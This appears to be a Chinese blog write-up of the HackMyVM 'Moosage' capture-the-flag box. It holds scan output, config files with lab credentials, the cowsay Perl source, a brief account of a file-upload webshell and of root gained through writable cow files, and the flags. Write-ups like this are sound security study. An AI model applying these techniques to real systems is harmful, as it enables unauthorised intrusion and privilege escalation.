Post

hackmyvm Moosage靶机复盘

难度-Hard

Posted
By
8 min read
hackmyvm Moosage靶机复盘

网段扫描

1
2
3
4
5
6
7
8

Interface: eth0, type: EN10MB, MAC: 00:0c:29:d1:27:55, IPv4: 192.168.137.190
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.137.1	3e:21:9c:12:bd:a3	(Unknown: locally administered)
192.168.137.64	a0:78:17:62:e5:0a	Apple, Inc.
192.168.137.83	3e:21:9c:12:bd:a3	(Unknown: locally administered)

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.059 seconds (124.33 hosts/sec). 3 responded

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

root@LingMj:~/xxoo/jarjar# nmap -p- -sV -sC 192.168.137.83 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-18 02:56 EDT
Nmap scan report for moosage.mshome.net (192.168.137.83)
Host is up (0.064s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 02:65:e6:05:af:c8:81:9c:30:b0:da:e3:1e:d8:be:02 (RSA)
|   256 3f:7d:4b:86:8d:c7:01:8f:b3:56:6d:65:c2:e5:cf:4e (ECDSA)
|_  256 8e:d4:b8:d6:8e:d9:61:a1:3e:7f:5e:d7:ec:dc:bb:de (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-title: 403 Forbidden
|_http-server-header: nginx/1.14.2
MAC Address: 3E:21:9C:12:BD:A3 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.85 seconds

获取webshell

picture 0
picture 1
picture 2
picture 3

不知道密码

picture 4
picture 5
picture 6

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

version: "3"

services:
  webserver:
    image: m1k1o/blog:latest
    container_name: blog_apache
    environment:
      TZ: Europe/Vienna
      BLOG_DB_CONNECTION: mysql
      BLOG_MYSQL_HOST: mariadb
      BLOG_MYSQL_PORT: 3306
      BLOG_MYSQL_USER: root
      BLOG_MYSQL_PASS: root
      BLOG_DB_NAME: blog
    restart: unless-stopped
    ports:
      - ${HTTP_PORT-80}:80
    volumes: 
      - ${DATA-./data}:/var/www/html/data
  mariadb:
    image: mariadb:10.1
    container_name: blog_mariadb
    environment:
      MYSQL_DATABASE: blog
      MYSQL_ROOT_PASSWORD: root
    restart: unless-stopped
    volumes:
      - mariadb:/var/lib/mysql
      - ./app/db/mysql:/docker-entrypoint-initdb.d:ro
volumes:
  mariadb:

这里有一个docker imgaes

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68

[database]
db_connection = sqlite
;sqlite_db = data/sqlite.db

;[database]
db_connection = mysql
mysql_socket = /run/mysqld/mysqld.sock
mysql_host = localhost
mysql_port = 3306
mysql_user = baca
mysql_pass = youareinsane
db_name = moosage

[profile]
title = Blog
name = Max Musermann
pic_small = static/images/profile.jpg
pic_big = static/images/profile_big.jpg
;cover = static/images/cover.jpg

[language]
lang = en

[components]
highlight = true

[custom]
theme = theme02
;header = data/header.html
;styles[] = static/styles/custom1.css
;styles[] = static/styles/custom2.css
;scripts = static/styles/scripts.css

[bbcode]
;bbtags[quote] = "<quote>{param}</quote>"

[admin]
force_login = true
nick = demo
pass = demo

[friends]
;friends[user] = pass
;friends[user] = pass

[directories]
images_path = data/i/
thumbnails_path = data/t/
logs_path = data/logs/

[proxy]
;proxy = hostname:port
;proxyauth = username:password
;proxytype = CURLPROXY_HTTP ; default, if not set
;proxytype = CURLPROXY_SOCKS4
;proxytype = CURLPROXY_SOCKS5

;URL_PREFIX type:
;proxy = http://your.page.com/proxy.cgi?
;proxyauth = username:password
;proxytype = URL_PREFIX

[system]
;timezone = Europe/Vienna
system_name = blog
version = 1.3
debug = false
logs = false

还有一个config.ini

picture 7

上面有登录的demo

picture 9

picture 8

文件上传

提权

picture 10

密码上面也有感觉这里都挺简单

picture 11
picture 12

登不上

picture 13
picture 14

目前没啥有用信息推测2条路了一个suforce一个是内核了,先看内核

picture 15

无定时任务

picture 16

内核也不见

picture 17
picture 18

把希望寄托在/usr/games/cowsay

picture 19

picture 20

还必须私钥我以为可以密码登录

picture 21
picture 22

果然在这里

picture 23

一登录出现这个

picture 24

咋利用呢

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206

#!/usr/bin/perl

##
## Cowsay 3.03
##
## This file is part of cowsay.  (c) 1999-2000 Tony Monroe.
##

use Text::Tabs qw(expand);
use Text::Wrap qw(wrap fill $columns);
use File::Basename;
use Getopt::Std;
use Cwd;
use Text::CharWidth qw(mbswidth);

if (${^UTF8LOCALE}) {
    binmode STDIN, ':utf8';
    binmode STDOUT, ':utf8';
    require Encode;
    eval { $_ = Encode::decode_utf8($_,1) } for @ARGV;
}

$version = "3.03";
$progname = basename($0);
$eyes = "oo";
$tongue = "  ";
$cowpath = $ENV{'COWPATH'} || '/usr/share/cowsay/cows';
@message = ();
$thoughts = "";

## Yeah, this is rude, I know.  But hopefully it gets around a nasty
## little version dependency.

$Text::Wrap::initial_tab = 8;
$Text::Wrap::subsequent_tab = 8;
$Text::Wrap::tabstop = 8;

## One of these days, we'll get it ported to Windows.  Yeah, right.

if (($^O eq "MSWin32") or ($^O eq "Windows_NT")) {	## Many perls, eek!
    $pathsep = ';';
} else {
    $pathsep = ':';
}

%opts = (
    'e'		=>	'oo',
    'f'		=>	'default.cow',
    'n'		=>	0,
    'T'		=>	'  ',
    'W'		=>	40,
);

getopts('bde:f:ghlLnNpstT:wW:y', \%opts);

&display_usage if $opts{'h'};
&list_cowfiles if $opts{'l'};

$borg = $opts{'b'};
$dead = $opts{'d'};
$greedy = $opts{'g'};
$paranoid = $opts{'p'};
$stoned = $opts{'s'};
$tired = $opts{'t'};
$wired = $opts{'w'};
$young = $opts{'y'};
$eyes = substr($opts{'e'}, 0, 2);
$tongue = substr($opts{'T'}, 0, 2);
$the_cow = "";

&slurp_input;
$Text::Wrap::columns = $opts{'W'};
@message = ($opts{'n'} ? expand(@message) : 
	    split("\n", fill("", "", @message)));
&construct_balloon;
&construct_face;
&get_cow;
print @balloon_lines;
print $the_cow;

sub list_cowfiles {
    my $basedir;
    my @dirfiles;
    chop($basedir = cwd);
    for my $d (split(/$pathsep/, $cowpath)) {
	print "Cow files in $d:\n";
	opendir(COWDIR, $d) || die "$0: Cannot open $d\n";
	for my $file (readdir COWDIR) {
	    if ($file =~ s/\.cow$//) {
		push(@dirfiles, $file);
	    }
	}
	closedir(COWDIR);
	print wrap("", "", sort @dirfiles), "\n";
	@dirfiles = ();
	chdir($basedir);
    }
    exit(0);
}

sub slurp_input {
    unless ($ARGV[0]) {
	chomp(@message = <STDIN>);
    } else {
	&display_usage if $opts{'n'};
	@message = join(' ', @ARGV);
    }
}

sub maxlength {
    my ($l, $m);
    $m = -1;
    for my $i (@_) {
	# $l = mbswidth $i;
        $l = mbswidth $i =~ s/\e\[\d+(?>(;\d+)*)m//gr;
	$m = $l if ($l > $m);
    }
##  maxlength patch from Jeronimo Pellegrini (Closes: #165218)
    if ($m == -1) {
	$m = 0;
    }
    return $m;
}

sub colstr {
    (my $str, my $columns) = @_;
    $str . ' ' x ($columns - mbswidth $str)
}

sub construct_balloon {
    my $max = &maxlength(@message);
    my $max2 = $max + 2;	## border space fudge.
    my $format = "%s %s %s\n";
    my @border;	## up-left, up-right, down-left, down-right, left, right
    if ($0 =~ /think/i) {
	$thoughts = 'o';
	@border = qw[ ( ) ( ) ( ) ];
    } elsif (@message < 2) {
	$thoughts = '\\';
	@border = qw[ < > ];
    } else {
	$thoughts = '\\';
	if ($V and $V gt v5.6.0) {		# Thanks, perldelta.
	    @border = qw[ / \\ \\ / | | ];
	} else {
	    @border = qw[ / \ \ / | | ];	
	}
    }
## no trailing spaces (#276144)
    push(@balloon_lines, 
	" " . ("_" x $max2) . "\n" ,
        sprintf($format, $border[0], colstr($message[0], $max), $border[1]),
	(@message < 2 ? "" :  
            map { sprintf($format, $border[4], colstr($_, $max), $border[5]) } 
		@message[1 .. $#message - 1]),
	(@message < 2 ? "" : 
            sprintf($format, $border[2], colstr($message[$#message], $max), $border[3])),
        " " . ("-" x $max2) . "\n"
    );
}

sub construct_face {
    if ($borg) { $eyes = "=="; }
    if ($dead) { $eyes = "xx"; $tongue = "U "; }
    if ($greedy) { $eyes = "\$\$"; }
    if ($paranoid) { $eyes = "@@"; }
    if ($stoned) { $eyes = "**"; $tongue = "U "; }
    if ($tired) { $eyes = "--"; } 
    if ($wired) { $eyes = "OO"; } 
    if ($young) { $eyes = ".."; }
}

sub get_cow {
##
## Get a cow from the specified cowfile; otherwise use the default cow
## which was defined above in $the_cow.
##
    my $f = $opts{'f'};
    my $full = "";
    if ($opts{'f'} =~ m,/,) {
	$full = $opts{'f'};
    } else {
	for my $d (split(/:/, $cowpath)) {
	    if (-f "$d/$f") {
		$full = "$d/$f";
		last;
	    } elsif (-f "$d/$f.cow") {
		$full = "$d/$f.cow";
		last;
	    }
	}
	if ($full eq "") {
	    die "$progname: Could not find $f cowfile!\n";
	}
    }
    do $full;
    die "$progname: $@\n" if $@;
}

sub display_usage {
	die <<EOF;
cow{say,think} version $version, (c) 1999 Tony Monroe
Usage: $progname [-bdgpstwy] [-h] [-e eyes] [-f cowfile] 
          [-l] [-n] [-T tongue] [-W wrapcolumn] [message]
EOF
}

perl写的东西

picture 25

全是可写的那就是写个命令进去得了

picture 26
picture 27

没成功

picture 28

用perl操作一下

picture 30

picture 29

还真是这个结束了

picture 31

整体难度不难medium最多

userflag:hmvmessageme

rootflag:hmvyougotmooooooo

hackmyvm
upload
This post is licensed under CC BY 4.0 by the author.